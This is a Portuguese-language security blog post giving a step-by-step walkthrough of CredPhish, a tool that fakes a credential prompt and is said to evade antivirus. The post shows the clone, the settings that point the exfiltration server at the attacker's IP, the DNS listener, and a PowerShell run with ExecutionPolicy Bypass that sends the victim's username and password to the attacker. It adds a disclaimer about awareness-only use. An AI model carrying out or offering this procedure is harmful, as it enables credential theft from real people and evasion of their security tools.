InformationSecurityPro

Marcos Henrique

Information Security Pro

O CredPhish realiza a captura de usuários e senhas e utiliza mecanismos que visam bypassar as camadas de proteção dos Antivírus.

É recomendável utilizar esta ferramenta apenas para ações de conscientização de segurança a fim de destacar os riscos que todos estamos expostos.

🔴 O uso indevido desta ferramenta é de sua total responsabilidade e está sujeito as penalizações prevista na Lei 12.737.

01 - Passo

Realize o clone do projeto CredPhish e liste o conteúdo do diretório :

git clone https://github.com/tokyoneon/CredPhish

cd CredPhish/

ls -l

02 - Passo

Envie o script credphish.py para a máquina da Vítima e altera as linhas 2 e 6 :

$exfilServer = "IP do Atacante"
$companyEmail = "Domínio do E-mail"

03 - Passo

Execute o script dns_server.py

./dns_server.py

04 - Passo

Execute o script credphish.ps1 e preencha os campos :

PowerShell.exe -ExecutionPolicy Bypass .\credphish.ps1

05 - Passo

O Usuário e a Senha são enviados para a máquina do Atacante :

REDTEAM[[email protected]:P@ssw0rd]

👍 Se este artigo te ajudou compartilhe!

Autor

Marcos Henrique

São Paulo/SP

Ataques de Senhas

GMail - Como Ativar a Prote...

Ativar a Proteção Avançada no GMail é recomenda....

WUR - WP Users Report

WP Users Report é uma ferramenta automatizada p....

Groq - Ultra velocidade em IA

Groq é uma empresa de soluções em IA que oferec....

Ollama - Guia Rápido de Ins...

Ollama é uma ferramenta de código aberto que pe....

Contato